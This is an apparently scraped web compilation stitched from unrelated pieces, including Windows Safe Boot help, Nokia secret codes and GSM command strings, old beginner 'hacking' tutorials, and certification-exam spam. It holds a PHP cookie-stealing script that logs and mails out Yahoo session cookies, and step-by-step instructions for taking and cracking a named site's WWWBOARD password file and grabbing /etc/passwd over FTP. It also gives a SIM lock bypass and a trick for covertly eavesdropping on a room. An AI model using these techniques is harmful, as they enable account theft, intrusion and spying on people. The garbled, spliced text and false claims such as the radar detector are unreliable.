MORE INFORMATION To use a Safe Boot option, follow these steps: 1.

Restart your computer and start pressing the F8 key on your keyboard. On a computer that is configured for booting to multiple operating systems, you can press the F8 key when the Boot Menu appears. 2. Select an option when the Windows Advanced Options menu appears, and then press ENTER. 3. When the Boot menu appears again, and the words "Safe Mode" appear in blue at the bottom, select the installation that you want to start, and then press ENTER.

Back to the top

Description of Safe Boot options Safe Mode (SAFEBOOT_OPTION=Minimal): This option uses a minimal set of device drivers and services to start Windows. Safe Mode with Networking (SAFEBOOT_OPTION=Network): This option uses a minimal set of device drivers and services to start Windows together with the drivers that you must have to load networking. Safe Mode with Command Prompt (SAFEBOOT_OPTION=Minimal(AlternateShell)): This option is the same as Safe mode, except that Cmd.exe starts instead of Windows Explorer. Enable VGA Mode: This option starts Windows in 640 x 480 mode by using the current video driver (not Vga.sys). This mode is useful if the display is configured for a setting that the monitor cannot display.

Note Safe mode and Safe mode with Networking load the Vga.sys driver instead. Last Known Good Configuration: This option starts Windows by using the previous good configuration. Directory Service Restore Mode: This mode is valid only for Windows-based domain controllers. This mode performs a directory service repair. Debugging Mode: This option turns on debug mode in Windows. Debugging information can be sent across a serial cable to another computer that is running a debugger. This mode is configured to use COM2. Enable Boot Logging: This option turns on logging when the computer is started with any of the Safe Boot options except Last Known Good Configuration. The Boot Logging text is recorded in the Ntbtlog.txt file in the %SystemRoot% folder.

 Starts Windows Normally: This option starts Wi*** WARNING: Using secret codes may be harmful to your phone and result in disabling or worse. Use these codes at your own discretion, we accept no responsiblility for blocked pones while using these codes!!! IMEI Number *#06# Cells Identity Code (IMEI = International Mobile Equipment Identity) XXXXXX XX XXXXXX X TAC FAC SNR SP TAC = Type Approval Code (first 2 digits = country code of the approval-country ) FAC = Final Assembly Code: (01,02 = AEG) (10,20 Nokia) (40,41,44 Siemens) (30 Ericsson) (50 Bosch) (51 Sony,Siemens,Ericsson) (60 Alcatel) (65 AEG) (70 Sagem) (75 Dancall) (80 Philips) (85 Panasonic) SNR = Serial Nr. SP = Spare (always "0")

Software Version *#0000# shows the software version Signal Processing

*3370# - Enchanced full Rate Codec (EFR) activation. It will automatically restart. #3370# - Enchanced full Rate Codec (EFR) deactivation *4720# - Half Rate Codec activation. It will automatically restart. #4720# - Half Rate Codec deactivation Enchanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ASELP (AlgebraicCode Excitation Linear Prediction) compression technology. This technology allows for much great voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits.(but you take up more space on the network, so they can charge you more) - Talk-time is reduced with about 5%

Sim Clock Stopping *#746025625# [*#sim0clock#] Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59. It will tell you if it can be stopped or not.

Warrenty Menu *#92702689# takes you to a secret menu with 6 choices: [*#war0anty#] 1. Displays Serial Number. 2. Displays the Month and Year of Manufacture (0997). 3. Displays (if there) the date where the phone was purchased (MMYY). 4. Displays the date of the last repairment - if found (0000).

5. Makes you capable of transferring user data if you have the gear for it. 6. Shows how long the phone has been used to talk. This counter is not reset by when you "clear timers" like the counters in the call register.

Bypass the SP lock With a Nokia 16xx/21xx/31xx/51xx/81xx 1. Insert SIM card of different provider. 2. Turn on the phone and press the UP VOLUME key for 3 sec. Then release it and the phone says PIN CODE? 3. Press the "C" key. 4. Then Press * and wait until it disappears and appears again, then press * one more time and 04*PIN*PIN*PIN#

Nokia Speed Trap Detector Urban Legend spread by Nokia Engineers ;^) The settings for radar speed traps detector. Your Nokia cell phone can be programmed to pick up radar speed traps, when programmed your cell phone picks up the radar and alerts you on the message alert tone. ( Doesn't work with Nokia 7110! ) 1. Enter your menu 2. Select settings 3. Select security settings 4. Select closed user group 5. Select on 6. Enter 00000 7. Press ok 8. Clear back to normal, within a few seconds your phone will display a radar sign with five zero's next to it. It is now activated.

Unfortunately only Nokia phones have this function. The Cell Phone info display needs to be deactivated. Settings -> Phone Settings -> Cell Info display. Each time you turn off your phone, or even each time you loose contact with your carrier, you'll have to activate it again... It is done using steps 1 through 5 above, but the number (00000) will be already on the field as a default.

The James Bond Trick

If you short-circuit the left middle and right pins on the bottom of the phone with all connections touching each other, the Nokia software hangs! The profile "Headset" will be activated. Before you do this just activate the "Automatic Answer" in the headset profile and set the ringing volume to "Mute". Now you can use your phone for checking out what people are talking about in a room. Just place it under a table in a room and call it. The phone receives the call without ringing and you can listen to what people are saying! Network Monitor There is a hidden menu inside your Nokia phone. If you want to activate it, you'll have to re-program some chips inside of your phone. Check your software version. You can only continue if you have v4.33, v4.73 or v5.24. Take apart the phone. De-solder the EEPROM (ATMEL AT 24C64) Read out the data with an EEPROM programmer and save it to a file (Backup) If you have v.33 or v4.73, change the address "03B8" from "00" to "FF" If you have v5.24 then change the address "0378" from "00" to "FF" Write the new data to the EEPROM and solder it back to the phone Power on your phone and you should have "Netmonitor" enabled. The Network Monitor gives you the following information:

Carrier number, MS RX Level in DBM, Received signal quality, MS TX power level, C1 (Path loss criterion, used for cell selection and reselection). The range is -99 to 99, RTL (Radio link timeout), Timeslot, Indication of the transmitter status, Information on the Network parameters, TMSI (Temporary Mobile Subscriber Identity), Cell identification (Cell ID, Number of cells being used), MCC (Mobile country code), MCN (Mobile network code), LAC (Location area code), Ciphering (On/Off), Hopping (On/Off), DTX (On/Off), Discard cell barred information.

Game Hacking with Blizzard

Get the file called the 'BlizzardN-GAGE.SIS' from IRC get in #mediaplace on Efnet (note: Downloading cracked/Hacked games is illegal unless you already own a copy of game) The Blizzard Nokia N-Gage Installer. 1. Unpack Blizzard.sis file that you get from mIRC 2. Transfer the .sis file to your N-Gage 3. Get the .blz (N-gage ROM) from mIRC 4. copy the file to the root dir of your MMC (16MB MMC)Multimedia Card 5. Use the Blizzard application to unpack the .blz file 6. After unpacking the sonic icon should appeared in the MENU 7. Clicked sonic icon and it should work !

List of compatible games for the 3650,6600 and the N-gage that work: [3650] SonicN (v.2.5+)

Puyo Pop (v.2.5+) [6600] SonicN Puyo Pop Pandemonium Tomb Raider Super Monkey Ball Tony Hawks Pro Skater [N-Gage] SonicN Puyo Pop Pandemonium Tomb Raider Super Monkey Ball Tony Hawks Pro Skater GSM Network Services Command Strings When various network functions are selected via the cellphone's menu using the keypad, the cellphone automatically generates the corresponding GSM network command string and transmits it to the network. These commands can however be manually entered via the keypad.

Each command is prefixed with either one or two * or # characters as follows: ** Register and Activate * Activate ## De-Register (and Deactivate) # Deactivate

*# Check Status Call button

Once each command has been entered, if it is a network command (as opposed to a local handset command) it must be transmitted to the network by pressing the YES (receiver) key which acts as an enter key - this is represented here with the character. Always enter numbers in full international format +CountryAreaNumber ( e.g. +447712345678). Command Description Command String Security Change call barring code **03*OldCode*NewCode*NewCode# Change call barring code **03*330*OldCode*NewCode*NewCode# Change PIN code **04*OldPIN*NewPIN*NewPIN# Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2# Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN# Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2# Display IMEI *#06# Call Forwarding (Diversions) De-register all call diversions ##002# Set all configured call diversions to number and activate **004*number# De-register all configured call diversions (no answer, not reachable, busy) ##004# Unconditionally divert all calls to number and activate **21*number# Activate unconditionally divert all calls *21# De-register unconditionally divert all calls ##21# Deactivate unconditionally divert all calls #21# Check status of unconditionally divert all calls *#21# Divert on no answer to number and activate **61*number#

Activate divert on no answer *61# De-register divert on no answer ##61# Deactivate divert on no answer #61# Check status of divert on no answer *#61# Divert on not reachable to number and activate **62*number# Activate divert on not reachable *62# De-register divert on not reachable ##62# Deactivate divert on not reachable #62# Check status of divert on not reachable *#62# Divert on busy to number and activate /td> **67*number#< Activate divert on busy *67# De-register divert on busy ##67# Deactivate divert on busy #67# Check status of divert on busy *#67# Change number of seconds of ringing for the given service before diverting a call (such as on no answer). Seconds must be a value from 5 to 30. De-registering the same divert will also delete this change! **service*number**seconds# (Service numbers, see below) Call barring Activate barr all outgoing calls (see Security to set code) **33*code# Deactivate barr all outgoing calls #33*code# Check status of barr all outgoing calls *#33# Activate barr all calls **330*code# Deactivate barr all calls #330*code# Check status of barr all calls /td> *#330*code#< Activate barr all outgoing international calls **331*code# Deactivate barr all outgoing international calls #331*code#

Check status of barr all outgoing international calls *#331# Activate barr all outgoing international calls except to home country **332*code# Deactivate barr all outgoing international calls except to home country #332*code# Check status of barr all outgoing international calls except to home country *#332# Activate barr all outgoing calls **333*code# Deactivate barr all outgoing calls #333*code# Check status of barr all outgoing calls *#333# Activate barr all incoming calls **35*code# Deactivate barr all incoming calls #35*code# Check status of barr all incoming calls *#35# Activate barr all incoming calls when roaming **351*code# Deactivate barr all incoming calls when roaming #351*code# Check status of barr all incoming calls when roaming *#351# Activate barr all incoming calls **353*code# Deactivate barr all incoming calls #353*code# Check status of barr all incoming calls *#353# Call waiting Activate call waiting *43*# Deactivate call waiting #43## Check status of call waiting *#43# Calling Line Identification The following only works if CLIP and CLIR are enabled (ask your service provider) CLIP: Presentation of the number of the incoming call Activate CLIP **30# Deactivate CLIP ##30#

Check status of CLIP *#30# CLIR: Presentation of one's own number to the to the called party Activate CLIR **31# Activate CLIR for the actual call *31#number Deactivate CLIR ##31# Deactivate CLIR for the actual call #31#number Check status of CLIR *#31# COLP: Presentation of the actual number reached (if number called was diverted to another number Activate COLP *76# Deactivate COLP #76# Check status of COLP *#76# COLR: Presentation of the original number called by the calling party (if the call was diverted to this cellphone) Activate COLR *77# Deactivate COLR #77# Check status of COLR *#77#

Cellphone Services 10 All types of cellphone services 11 Speech service 12 Data service 13 Fax 14 Datex-J 15 Teletex 16 Short message service (SMS) 18 All data services without SMS

19 All cellphone services without SMS

Carrier Services 20 All services 21 All asynchronous services 22 All synchronous services 23 3.1kHz services 24 Synchronous point-to-point connections including PAD's (all synchronous data services) 25 Asynchronous point-to-point connections including PAD's (all asynchronous data services) 26 Data packet sending including PAD's (all synchronous data packet services) 27 Services with PAD-share 29 Digital connection with 12kbps

GSM Network Service Codes Note that at present only the following service codes are in use: 11 Speech 13 fax 25 data

Cell Broadcast While Short Message Service (SMS) can be configured as a personal service, Cell Broadcast is a general service which is designed for subscribers of a specific cell or topic. For example, a subscriber to cell 050 in England will receive information on the GSM tower currently being used by their phone. This new concept brings a whole new meaning to the term mobile communications as the phone is now able to receive information such as share prices or weather updates without the need of data cards and computers. At present the following message types exist (note: this may vary from carrier to carrier and some carriers may charge for this service):

Code Title 000 Index 010 Flashes 020 Hospitals 022 Doctors 024 Pharmacy 030 Long Distant Road Reports 032 Local Road Reports 034 Taxis 040 Weather 050 District 052 Network Information 054 Operator Services 056 Directory Inquiries (national) 057 Directory Inquiries (international) 058 Customer Care (national) 059 Customer Care (international)

In the future one will be able to control each individual call by use of the following service codes. To do this the user has to insert the service code in front of the last # in the MMI command above.

Or More

Secret Codes for some Nokia models Nokia 9000/9000i

To view IMEI number *#06# To view Software Version enter *#8110# Latest Version is under Phone Info. To view Week and Year of manufacture enter *#3283#

Nokia 9110

*#06# for checking the IMEI (International Mobile Equipment Identity) *#0000# shows the SW version.

Latest software version: v5.02 (26-08-99)RAE-2

Nokia 7110

*#06# for checking the IMEI (International Mobile Equipment Identity) *#0000# To view Software Version. *#3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart. *#3370* - Enhanced Full Rate Codec (EFR) deactivation. It will automatically restart. *#4720# - Half Rate Codec activation. It will automatically restart *#4720* - Half Rate Codec deactivation. It will automatically restart *#746025625# - Sim clock allowed status. *#92702689# [*#war0anty#] - takes you to a secret menu with 6 choices:

1. Displays Serial Number. 2. Displays the Month and Year of Manufacture (0997) 3. Displays (if there) the date where the phone was purchased (MMYY) 4. Displays the date of the last repairment - if found (0000) 5. makes you capebel of transferring user data if you have the gear for it 6. shows how many hours the phone has been on

Latest software version: 4.77 25-01-00 NSE-5 - EFR and half rate codes do not work with these version.

V 4.76 13-01-00 NSE-5 V 4.75 07-01-00 NSE-5 V 4.73 15.11.99 NSE-5

Nokia 6190

*#06# for checking the IMEI (International Mobile Equipment Identity) *#6190# shows the SW version. *#92772689# (after removing the analog module) shows service menu. *3001#12345[OK] to enter test mode. *#639# to change NAM.

Nokia 3810

To view IMEI number *#06# To view Software Version enter *#3810#

Nokia 6120 / 6160 / 6162 (TDMA phones)

*#92772689# for checking ISDN number. *3001#12345# for field test mode and nam selection and some other stuff... *#9999# shows the SW version

Nokia 3210 Secret Codes Nokia 3210

*#06# for checking the IMEI (International Mobile Equipment Identity) Information you get from the IMEI:

XXXXXX XX XXXXXX X

TAC FAC SNR SP

TAC = Type approval code FAC = Final assembly code SNR = Serial number SP = Spare

*#0000# To view Software Version.

#746025625# [*#sim0clock#] Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59.

*#92702689# [*#war0anty#] takes you to a secret menu with 6 choices:

1. Displays Serial Number. 2. Displays the Month and Year of Manufacture (0997) 3. Displays (if there) the date where the phone was purchased (MMYY) 4. Displays the date of the last repairment - if found (0000) 5. makes you capebel of transferring user data if you have the gear for it 6. shows how many hours the phone has been on

Latest software version: V 5.02 NSE-8/9

*#3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart. *#3370* - Enhanced Full Rate Codec (EFR) deactivation. It will automatically restart. *#4720# - Half Rate Codec activation. It will automatically restart *#4720* - Half Rate Codec deactivation. It will automatically restart

Enhanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ASELP (Algebraic Code Excitation Linear Prediction) compression technology. This technology allows for much great voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPCRPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits.(but you take up more space on the network, so they can charge you more) - Talk-time is reduced by about 5% when using the ERF option.
Hacking is an act of penetrating computer systems to gain knowledge about the system and how it works.

What is Hacking?

What are Hackers?

Technically, a hacker is someone who is enthusiastic about computer programming and all things relating to the technical workings of a computer. Under such a definition, I would gladly brand myself a hacker. However, most people understand a hacker to be what is more accurately known as a cracker

What are Crackers?

Crackers are people who try to gain unauthorized access to computers. This is normally done through the use of a backdoor program installed on your machine. A lot of crackers also try to gain access to resources through the use of password cracking software, which tries billions of passwords to find the correct one for accessing a computer.

What damage can a Hacker do?

This depends upon what backdoor program(s) are hiding on your PC. Different programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker cant do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing, and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that could be done to a file. A hacker could install several programs on to your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card information

How do Hackers hack?

There are many ways in which a hacker can hack. Some are as follows

NetBIOS ICMP Ping FTP rpc.statd HTTP

NetBIOS
NetBIOS hacks are the worst kind, since they dont require you to have any hidden backdoor program running on your computer. This kind of hack exploits a bug in Windows 9x. NetBIOS is meant to be used on local area networks, so machines on that network can share information. Unfortunately, the bug is that NetBIOS can also be used across the Internet - so a hacker can access your machine remotely.

ICMP Ping (Internet Control Message Protocol)

ICMP is one of the main protocols that make the Internet work. It standards for Internet Control Message Protocol. Ping is one of the commands that can be sent to a computer using ICMP. Ordinarily, a computer would respond to this ping, telling the sender that the computer does exist. This is all pings are meant to do. Pings may seem harmless enough, but a large number of pings can make a Denial-of-Service attack, which overloads a computer. Also, hackers can use pings to see if a computer exists and does not have a firewall (firewalls can block pings). If a computer responds to a ping, then the hacker could then launch a more serious form of attack against a computer.

FTP (File Transfer Protocol)

FTP is a standard Internet protocol, standing for File Transfer Protocol. You may use it for file downloads from some websites. If you have a web page of your own, you may use FTP to upload it from your home computer to the web server. However, FTP can also be used by some hackers FTP normally requires some form of authentication for access to private files, or for writing to files FTP backdoor programs, such as

Doly Trojan Fore Blade Runner

simply turn your computer into an FTP server, without any authentication. rpc.statd This is a problem specific to Linux and Unix. The problem is the infamous unchecked buffer overflow problem. This is where a fixed amount of memory is set aside for storage of data. If data is received that is larger than this buffer, the program should truncate the data or send back an error, or at least do something other than ignore the problem. Unfortunately, the data overflows the memory that has been allocated to it, and the data is written into parts of memory it shouldnt be in. This can cause crashes of various different kinds. However, a skilled hacker could write bits of program code into memory that may be executed to perform the hackers evil deeds. HTTP HTTP stands for HyperText Transfer Protocol.. HTTP hacks can only be harmful if you are using Microsoft web server software, such as Personal Web Server. There is a bug in this software called an unchecked buffer overflow. If a user makes a request for a file on the web server with a very long name, part of the request gets written into parts of memory that contain active program code. A malicious user could use this to run any program they want on the server. Where and how to start Hacking After you get yourself a good scanner, scan some prefixes and find some cool dialups, then do the following:

First Method

From your terminal, dial the number you found. You will hear a series of Beeps. (Telling you that you are connecting to a remote computer. After few seconds you will hear something like CONNECT 9600. It then identifies the system you are on. If nothing happens after it says CONNECT 9600 try hitting ENTER a number of times. If you get a bunch of garbage adjust your parity, data bits, stop bits etc. until it becomes clear. Now when you get connected to the server you can apply either of the above mentioned methods.

Second Method
The TELNET way

Get your local dialups. Then you dial the number from your terminal & connect. Press Enter and wait for a few seconds. Then it will say Terminal =. Type your terminal emulation. If you dont know what it is hit ENTER. It will give you a prompt @. Type c(connects to the host) Type NAU (Network user address) that you want to connect.
Find out the type of system you are on UNIX, VAX/VSM, PRIME.

Here is a list of some Telenet commands and their functions.

c Connect to a host. stat Shows network port. Full Network echo. half Terminal echo. Telemail Mail. (need ID and password) mail Mail. (need ID and password) set Select PAD parameters cont Continue. d Disconnect. hangup Hangs up. access Telenet account. (ID and password)

attack methods become a hacker beginner level bluetooth hacking buffer overflow cookie exploit Cracking ddos attacks email Exploits fingerprinting ftp hacking Hacking hacking in ftp hacking in telnet hacking mysql hacking programs hacking registry hacking tools hacking websites ip address ip spoofing keylogger ms dos commands packet sniffing port scan reverse engineering snifflog.txt snoop TCP IP tcp protocol telnet hacking telnetting the hackers dictionary trojan tutorial undetectable trojan unethical hacking virus web vulnerability website hacking wireless hacking wireless network devices www hacking

ShareThis

How hackers steal yahoo passwords

1 Nov, 2007 1 Comment
account details attack methods become a hacker beginner level cookie exploit crack yahoo! mail crack yahoo passwords email Hacking php www hacking yahoo yahoo! software yahoo email yahoo account yahoo email yahoo id yahoo passwords

How hackers steal yahoo passwords This article is meant to provide more info on how to protect your yahoo account and every account in general and should not be used for stealing someones info, password etc. Its purely informative. My yahoo Id was recently accessed by an unknown person which used it to send promotional emails to my list of friends who, of course, accessed

them leaving the hacker another open door, and another and so on, the chain never ends. Hopefully yahoo wakes up. I did a search on this new thing that they use, it had to be something on the client side, a bug that could be sent inside an email, a new thing, undetected by yahoo, yet - its easier to attack than to defend they say. It didnt take me too much to find this code which writes the recipients cookie (stored in C:/ under the Cookies folder) inside a .log file that is copy-pasted by the hacker overwriting his own cookie that yahoo stored inside his computer and than easily accessing the victims yahoo email. The bug: which calls this php script: ? $file=cookie.log; if (isset($_REQUEST[id]) &&isset($_REQUEST[cookie])){ $logcookie =$_REQUEST[cookie]; $logcookie =rawurldecode($logcookie); $logemail = $_REQUEST[id]; $logemail =rawurldecode($logemail); if (file_exists($file)){ $handle=fopen($file,r+); $filecontence=fread($handle,filesize($file)); fclose($handle); } $handle=fopen($file, w); fwrite($handle, $logemail -$logcookie\n$filecontence\n ); //Writing email address and cookiethen the rest of the log fclose($handle); mail(email, $logemail,$logemail\n$logcookie\n$filecontence\n); } header(Location:http://mail.yahoo.com); ?> which writes the cookie to the hackers .log file that resides on his server. A very simple example but so deadly. NOTE: The code is a little changed to make it hard to use without PHP knowledge. How to protect yourself? My advice: DONT EVER OPEN EMAILS FROM AN UNKNOWN SENDER.
account details attack methods become a hacker beginner level cookie exploit crack yahoo! mail crack yahoo passwords email Hacking php www hacking yahoo yahoo! software yahoo email yahoo account yahoo email yahoo id yahoo passwords

ShareThis

How hackers steal - hack yahoo passwords

8 Jul, 2007 No Comment
cookie exploit easyer hacker hackers php script recipient stealing yahoo account yahoo email yahoo id yahoo passwords

How hackers steal yahoo passwords This article is ment to provide more info on how to protect your yahoo account and every account in general and should not be used for stealing someones info, password etc. Its purely informative. My yahoo Id was recently accessed by an unknown person which used it to send promotional emails to my list of friends who, of course, accessed them leaving the hacker another open door, and another and so on, the chain never ends. Hopefully yahoo wakes up. I did a search on this new thing that they use, it had to be something on the client side, a bug that could be sent inside an email, a new thing, undetected by yahoo, yet - its easyer to attack than to deffend they say.

It didnt take me too much to find this code which writes the recipients cookie (stored in C:/ under the Cookies folder) inside a .log file that is copy-pasted by the hacker overwriting his own cookie that yahoo stored inside his computer and than easilly accessing the victims yahoo email. The bug: which calls this php script:
<? $file=cookie.log; if (isset($_REQUEST[id]) &&isset($_REQUEST[cookie])){ $logcookie =$_REQUEST[cookie]; $logcookie =rawurldecode($logcookie); $logemail = $_REQUEST[id]; $logemail =rawurldecode($logemail); if (file_exists($file)){ $handle=fopen($file,r+); $filecontence=fread($handle,filesize($file)); fclose($handle); } $handle=fopen($file, w); fwrite($handle, $logemail -$logcookie\n$filecontence\n ); //Writing email address and cookiethen the rest of the log fclose($handle); mail(email, $logemail,$logemail\n$logcookie\n$filecontence\n); }

header(Location:http://mail.yahoo.com); ?> which writes the cookie to the hackers .log file that resides on his server. A very simple example but so deadly. NOTE: The code is a little changed to make it hard to use without PHP knowledge. How to protect yourself? My advice: DONT EVER OPEN EMAILS FROM AN UNKNOWN SENDER. Thoughts Aside Candidates for CISSP, should have 5 years experience in information security. The questions on the VCP-310 exam are more complex then the course material. For external sources for exams PMI-001, you need to buy study kits. These kits are designed by professionals who have completed exams like 650-178. Candidates studying for the 70-272 exam must understand how hackers work through script to enter yahoo email and find yahoo passwords. For individuals who havent worked with SQL servers are able to apply for the 70-431 exams. For windows server 2003, 70-290 exams are for those who have experience in networking environments.

Made on August 19, 1997. Introduction - OK, this file is intended solely for people who know very little about hacking, and when I say very little I mean very little. Now, for those of you jumping happily around and screaming "Finally, I am gonna be a hacker! stop jumping around and just sit down, take a few deep breaths, and just relax.

After reading this file you should be able to hack 1 - A WWWBOARD, 2 - FTP/UNIX sites, 3 - Website Tricks, and 4 - Neat stuff/Misc. with much confidence. Now, on to the disclaimer: *** I will NOT be held responsible for what you do with this information. *** NOTE: All commands that are written in this file, with the exception of the John the Ripper commands, like "edit passwd" are for DOS, so if you have UNIX use the VI editor or something of the sort. OK, now there is no specific table of contents of this file, I am pretty much just going to make it up as I go along. Now, for you advanced hackers out there, I would recommend just leaving this file because you probably won't find much in this file that you don't already know. All right, now that I'm done this stupid raving rant, I can start explaining how to go about learning what you want to learn. 1 - How to hack a WWWBOARD (Credit going to kM of www.hackersclub.com for coming up with this brilliant idea, lets all applaud kM.) OK, now obviously, in order to hack a WWWBOARD you need some sort of password file. Now, defaultly the passwd file is in the WWWBOARD directory. Most people who run the WWBOARD think to themselves "Hmm... What are the odds of some guy coming along and wanting to hack my WWWBOARD?" Well, the odds are pretty damn good. Now, when I say hack I mean both just to explore and just to do fun stuff like deleting files. I am not saying deleting files is GOOD, but sometimes it is fun. Anyway, the passwd file is almost always in the WWWBOARD directory, so lets take a real WWWBOARD. The URL is http://www.cobleskill.edu/projects/archeo/wwwboard/. Now, if you go to that URL you will see a listing of files. For the purpose of this file ONLY, and not malicious intent, I have not alerted the site of this problem. Now, go to that URL and click on the file passwd.txt. You will get two words that look like this: WebAdmin:aepTOqxOi4i8U The first word, WebAdmin, is the username of, obviously, the operator of this WWWBOARD. The second "word" is the password, now, your probably sitting there looking at that word thinking to yourself "God damn, that is one funky password!" Well, stop thinking that because yes, that is the password, but it is encrypted. So, you have to get a password cracker. Now, I recommend one of two Password Crackers, either CrackerJack or John the Ripper, both of these can be found at http://www.hackersclub.com or almost any other hacking site. Once you go and get a password cracker you will most likely need a Word File. Those to can be found at http://www.hackersclub.com. Once you get the necessary stuff, you will need to copy the password file, WebAdmin:aepTOqxOi4i8U, and paste it into an empty notepad file or something of the sort. Now, you are probably thinking to yourself again "Alright, now I can crack this bad-ass of a password and become a hacker!" Sorry to rain on your parade, but no. Yes, you might be able to crack the password, but then ask yourself one question, once I got the password, what do I do with it?? Do I go mail it to the server www.cobleskill.edu and say "Hey, I got your passwd, now give me complete access to your WWWBOARD!" Sorry, if you do

that, you will be thinking for about 10 years in prison "What did I do wrong?" or you might become Bruno's sweet boy. Sound like fun?? Didn't think so. OK, now IF you crack the password file, and you get the Username and Password, unencrypted of course, paste it into a text document or something, then add this right onto it ":-2:-2:anonymous NFS user:/:/bin/date" What that will do will turn the WWWBOARD passwd file into a UNIX passwd file. If you don't do that then you will never crack the file. All in all the passwd file should look like this: "WebAdmin:aepTOqxOi4i8U:2:-2:anonymous NFS user:/:/bin/date" Now, I don't use CrackerJack, so if you got that I can't help you, but if you got John the Ripper then type in this command in DOS : "john -pwfile:xxxxx -wordfile:xxxxx" XXXXX is whatever you named the passwd file or the word file. For example, "john -pwfile:hehe.txt -wordfile:WF.txt" It should just screw around for awhile and compute stuff and then if it is cracked you will get on the left side of the screen the passwd, WebBoard, and the Username, WebAdmin. Now, WebAdmin and WebBoard are the two-default username and passwds. Shows you about security these days. Now, once you got those two things, go into the WWWBOARD directory and look for a file(s) called WWWADMIN.CGI or WWWADMIN.PL or WWWBOARD.CGI or even WWWBOARD.PL. If none of those are there then you should examine the rest of the files in the directory. When I was in the directory the file wasn't there, but I found it nevertheless, I am not going to tell you what it is, but once you find it you will get something like this: WWWAdmin For WWWBoard Choose your Method of modifying WWWBoard Below: Remove Files Remove Files Remove Files by Message Number Remove Files by Date Remove Files by Author Password Change Admin Password That is, you guessed it, the little "Operating Station" for the WWWBOARD. Now, to do any of those things you must have the Username and Passwd that you cracked. So, click on an option and I think the rest is pretty much selfexplanatory. I really do not recommend trashing the WWWBOARD, some people depend on them to get a lot of questions and answers, etc. I usually just read all the hidden messages and stuff like that and then just leave or tell the Operator of the WWWBOARD that his board is 100% trashable. 2 - Hacking an FTP site OK, now hacking an FTP site WAS pretty easy a while ago, but nowadays most passwd files are shadowed which adds a little bit of extra security. I'll explain it later. OK, now, just before we start, the passwd file on UNIX machines is "passwd" not "passwd.txt." OK, now, for the example site we are going to use http://www.freestuff.com. Now, with the information I am going to give you will not let you hack this site because the passwd file is shadowed, as is almost every single website, but nevertheless, if you "experience" hacking long enough, you will find the answer on how to get the file. OK, now the first step is to do 1 of 2 things, get an FTP browser, like CuteFTP or BulletFTP or something, or you can use Win95 FTP which no one really knows about and how I found out is beyond my memory. OK, I will explain the FTP browser way first. OK, fire up the FTP Browser and for the host name plug in www.freestuff.com and for the port leave it at whatever it

is, and hit connect, if there are any other options, then just screw around with them for a while and you'll figure it out. Anyway, for the access type or whatever, click on Anonymous, and after you hit connect you'll get some directories in the Remote Host box, and some other neat stuff in Local Host. Now, in the Remote Host section you want to double click on the "etc" directory if it is visible, if it is not, then see in the pull-down menus if there is an option called custom command. If there is then click on it and for the command type in "cd etc" and it will either say "OK, CWD command accepted" or something along the lines of that or it will say "..:Access Denied" or even "Error:There is no file or directory by that name." If you get the CWD command accepted then were in business. In the /etc/ directory you should see a file called passwd. If you dont then go back up to custom command an for the command type in "get /etc/passwd" and it will either say "OK, Port command successful" or it will say "..:Access Denied." If you see that file then you can just drag the file over to local host and then click on the button "Start Download" or "Start Query" or something like that. Now, if you have Win95 FTP you will have to go the Start Menu MS-DOS Prompt and type in "FTP WWW.FREESTUFF.COM" and it will show up a bunch of neat little messages like "connecting to www.freestuff.com" and other stuff. Eventually you will get to the login screen where it will say "(USER)" or something interesting and long like that. Now, for User type in Anonymous. If it accepts it will say "Password" or it will say, "Anonymous access not allowed on this server." Now, obviously the FBI or CIA is not going to allow ftp access, so don't even try it. Now, if you get to the password part, just type in something interesting like "Suckhole@" and the ftp server will fill in the rest. You can make it anything you want, now you'll either get 1 of 2 messages, within a marginal error, "Cannot set guest privileges" or this "Anonymous access allowed, guest privileges set." Those should be the only two that you get. If there are any others, these messages are pretty much self explanatory. Now, when you log on, the first thing you want to type is this command "pwd." Just that, it will display the current directory that you are in. You want it to say "/." If it doesn't then type this command about 3 times "cd .." That will take you down 1 directory/subdirectory. Once you get to the "/" directory, type this command "ls -a." It will list all the files in the directory, including the hidden ones. Now, if you see something in the listing that says "etc" then type this command "cd etc." That will move you into the "etc" directory. Just to be sure, type in "pwd" again to make sure youre in the "etc" directory. If you are, then good, and type "ls -a" again and you should get some of these files: "Pwd.db, passwd, group, netconfig, net.config, or maybe even master.passwd." The two files we are most interested in are "passwd" and "master.passwd." I think what the files hold are kind of self-explanatory, but I'll tell you anyway, the "passwd" file holds all the usernames and passwd's that are on the entire system that your rooting around on. The "master.passwd" file will only show up if the passwd file is shadowed, and it also means the SysAdmin is a complete brain puppy. Forget "master.passwd" for now. The command you want to issue to this system is to get the "passwd" file from their computer to your computer, and we do that by simply typing, "get passwd." It should barf up some neat stuff, and then start transferring the file. When you get back to the ftp prompt you will have the passwd file on your C:\ drive or wherever you initiated the "ftp www.freestuff.com" from. Now, you just want to type in "quit." That will log you off the server. Now, for some reason right when you logoff the server you want to log back on just hit the "F3" key and it will pop up your last command. Now, what you want to do is move the passwd file to wherever your passwd cracker is. You can do that by typing, "move passwd X:\XX." X is the drive that your passwd cracker is on and XX is

the directory the passwd cracker is in. Then it should say something this: passwd -------> X:\XX -->OK" or something like that. Once you moved the passwd file go the passwd crackers directory and open up the by typing "Edit passwd." If the file has a bunch of stuff that looks this: root:x:x:x:x:x:x: daemon:x:x:x:x:x:x

like have file like

